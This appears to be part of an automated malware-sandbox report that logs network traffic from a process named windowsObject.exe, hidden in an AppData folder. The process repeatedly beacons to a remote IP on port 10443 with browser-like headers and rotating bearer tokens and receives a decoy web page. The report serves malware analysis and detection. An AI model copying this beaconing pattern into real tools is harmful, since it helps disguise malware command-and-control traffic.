          Mar 12, 2025 17:38:35.608036995 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:35.608083010 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:35.612689018 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:40.731575012 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:40.737349033 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:40.737430096 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:40.737560034 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:40.742981911 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.610940933 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.611360073 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.611422062 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:41.611459970 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.611942053 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.611953020 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.611972094 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.612000942 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:41.612013102 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:41.612263918 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:41.617561102 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:47.178045034 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:47.182823896 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:47.182905912 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:47.190242052 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:47.416965961 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:47.729353905 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:48.233757019 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:48.233942032 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:48.233959913 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:48.233975887 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:48.235621929 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.117772102 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.117789030 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.117880106 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:49.118165970 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.118177891 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.118192911 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.118227959 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:49.118288994 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:49.118331909 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:49.123006105 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:54.245462894 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:54.250289917 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:54.250406981 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:54.250559092 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:54.255194902 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.144752979 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.144892931 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.144903898 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.144975901 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:55.145294905 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.145306110 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.145320892 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.145353079 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:55.145385981 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:55.145483971 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:55.150135040 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:39:00.276686907 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:00.281718016 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:00.281820059 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:00.281969070 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:00.286617041 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.175746918 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.175764084 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.175981045 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:01.176054001 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.176064968 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.176085949 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.176111937 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:01.176126957 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:01.176209927 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:01.180840969 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:06.307951927 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:06.314810038 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:06.317099094 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:06.317131996 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:06.324215889 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195157051 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195183992 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195199013 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195310116 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:07.195583105 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195595026 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195633888 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195651054 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:07.195730925 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:07.195789099 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:07.200398922 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:12.404369116 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:12.409195900 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:12.409399986 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:12.409554958 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:12.414191961 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:13.351949930 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:13.351972103 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:13.352000952 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:13.352025032 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:13.354629993 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:13.354681015 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:13.358231068 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:13.365622997 CET104434973789.46.233.239192.168.2.4
          • 89.46.233.239
          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          0 | 192.168.2.4 | 49721 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:37:40.143381119 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer SLFDCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:37:41.406804085 CET | 1236 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:37:41 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          1 | 192.168.2.4 | 49722 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:37:46.547920942 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer XLJFCoiLjWhLcClHKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:37:47.417179108 CET | 1236 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:37:47 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          2 | 192.168.2.4 | 49723 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:37:52.548002005 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer SLTGCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:37:53.477308035 CET | 1236 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:37:53 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          3 | 192.168.2.4 | 49724 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:37:58.610642910 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer OLSPCoiLjThLcClBKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:37:59.484772921 CET | 160 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:37:59 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          4 | 192.168.2.4 | 49726 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:38:04.610944986 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer RLNCCoiLjLhLcClGKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:05.496951103 CET | 1236 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:05 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          5 | 192.168.2.4 | 49727 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:38:10.625745058 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer MLCNCoiLjJhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:11.492712975 CET | 160 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:11 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          6 | 192.168.2.4 | 49728 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:38:16.625381947 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer MLLQCoiLjChLcClBKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:17.503053904 CET | 1236 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:17 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          7 | 192.168.2.4 | 49729 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:38:22.736578941 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer FLCLCoiLjThLcClYKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:23.601264954 CET | 160 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:23 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          8 | 192.168.2.4 | 49730 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:38:28.736511946 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer MLHZCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:29.609715939 CET | 1236 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:29 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
